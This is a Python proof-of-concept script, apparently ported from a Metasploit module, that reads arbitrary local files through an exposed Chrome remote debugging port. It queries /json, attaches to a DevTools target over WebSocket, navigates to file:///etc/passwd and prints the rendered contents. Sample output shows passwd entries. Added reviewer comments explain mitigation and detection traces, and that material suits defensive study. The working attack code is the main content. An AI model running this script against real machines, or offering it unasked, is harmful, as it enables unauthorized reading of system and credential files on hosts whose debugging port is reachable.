Chrome Debugger Local File Inclusion (no CVE: a security misconfiguration when the remote debugging port is reachable by an attacker)
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
# pip install requests websocket-client python-socks | |
# This exploit code can be used to read arbitrary files on the victim machine with | |
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
import requests | |
import json | |
import urllib3 | |
import websocket | |
import random | |
# --- Reviewer notes (defensive reading of this PoC) -------------------------
# What the script shows: when a Chromium remote-debugging listener (port 9222
# here) is reachable from another host, an unauthenticated client can list the
# DevTools targets over HTTP (/json), attach to one over WebSocket and drive
# the browser with the DevTools protocol. The script navigates a page to a
# file:// URL and reads the rendered DOM back, which is the "LFI" in the title.
# Mitigation: Chromium binds this listener to loopback by default; exposure
# normally comes from --remote-debugging-address with a non-loopback address,
# from publishing the port out of a container, or from a CI/test runner that
# leaves the browser running. Keep the listener on loopback and do not leave
# --remote-debugging-port browsers running outside the test run.
# Detection: an HTTP GET to /json on the debugging port followed by a
# WebSocket upgrade to /devtools/page/<target id> from a non-loopback source,
# or DevTools Page.navigate commands carrying file:// URLs, are the traces a
# monitoring rule can key on.

# Only relevant to the commented-out verify=False proxied request below; the
# live request is plain HTTP, so this warning would never fire as written.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Interception-proxy settings (Burp-style, 8080/8081). proxyDict is referenced
# only by the commented-out request further down; the live code ignores it.
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"
ftp_proxy = "ftp://127.0.0.1:8081"
proxyDict = {
"http" : http_proxy,
"https" : https_proxy,
"ftp" : ftp_proxy
}
# Target-discovery endpoint: /json lists the open DevTools targets.
# "victim" is the gist's placeholder host name.
burp0_url = "http://victim:9222/json"
# Browser-like headers captured from an interception proxy. The /json endpoint
# does not require any of them; they only make the request resemble a normal
# page load in the server's logs.
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "sec-ch-ua": "\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
resp = requests.get(burp0_url, headers=burp0_headers).text
# resp = requests.get(burp0_url, headers=burp0_headers, proxies=proxyDict, verify=False).text
# print(resp)
# Attaches to the first listed target. Assumes /json returned a non-empty
# list; an empty list raises IndexError here and the script stops.
webSocketDebuggerUrl=json.loads(resp)[0]['webSocketDebuggerUrl']
print(webSocketDebuggerUrl)
# Random DevTools-protocol message id in 1000..5000 (the protocol echoes it
# back so replies can be matched to requests). NOTE: this shadows the
# builtin `id` for the rest of the script.
id = random.randint(1000, 5000)
# First DevTools command: Page.navigate to a file:// URL. The file is read by
# the browser process on the machine that runs Chrome, not by this client.
query = {
"id": id,
"method": "Page.navigate",
"params": {
"url": "file:///etc/passwd"
}
}
query_json = json.dumps(query)
# Open the DevTools WebSocket. No authentication is involved at any point:
# reachability of the port is the only requirement.
ws = websocket.create_connection(webSocketDebuggerUrl)
# ws = websocket.create_connection(webSocketDebuggerUrl, http_proxy_host="127.0.0.1", http_proxy_port="1080", proxy_type="socks5")
# ws.connect("ws://echo.websocket.events",
# http_proxy_host="127.0.0.1", http_proxy_port="8080",
# proxy_type="http", http_proxy_auth=("username", "password123"))
# send the JSON query
ws.send(query_json)
# Reply to Page.navigate (frameId/loaderId in the sample output below). The
# script does not wait for the load to finish before issuing the next
# command; it relies on the navigation being fast enough, which is fragile.
response = ws.recv()
print(response)
# Second DevTools command: Runtime.evaluate the page's outerHTML, i.e. the
# browser's rendering of the file loaded by the previous command.
query2 = {
"id": id + 1,
"method": "Runtime.evaluate",
"params": {
"expression": "document.documentElement.outerHTML"
}
}
query2_json = json.dumps(query2)
# send the second JSON query
ws.send(query2_json)
# Reply carrying result.result.value, the rendered file contents as HTML.
response2 = ws.recv()
print(response2)
# Close the WebSocket. Note that nothing above is wrapped in try/finally, so
# the socket is left open if either recv() raises.
ws.close()
# Sample output from the gist author's run (ids 1121/1122 are the random id
# and id + 1 chosen above):
# ws://victim:9222/devtools/page/3D53F4B043DE842A90FCB6A1B854B11A
# {"id":1121,"result":{"frameId":"3D53F4B043DE842A90FCB6A1B854B11A","loaderId":"EFD61728BF3DD2E0A2DEB05FF083FE3C"}}
# {"id":1122,"result":{"result":{"type":"string","value":"<html><head><meta name=\"color-scheme\" content=\"light dark\"></head><body><pre style=\"word-wrap: break-word; white-space: pre-wrap;\">root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/[...]/bin/false\n</pre></body></html>"}}}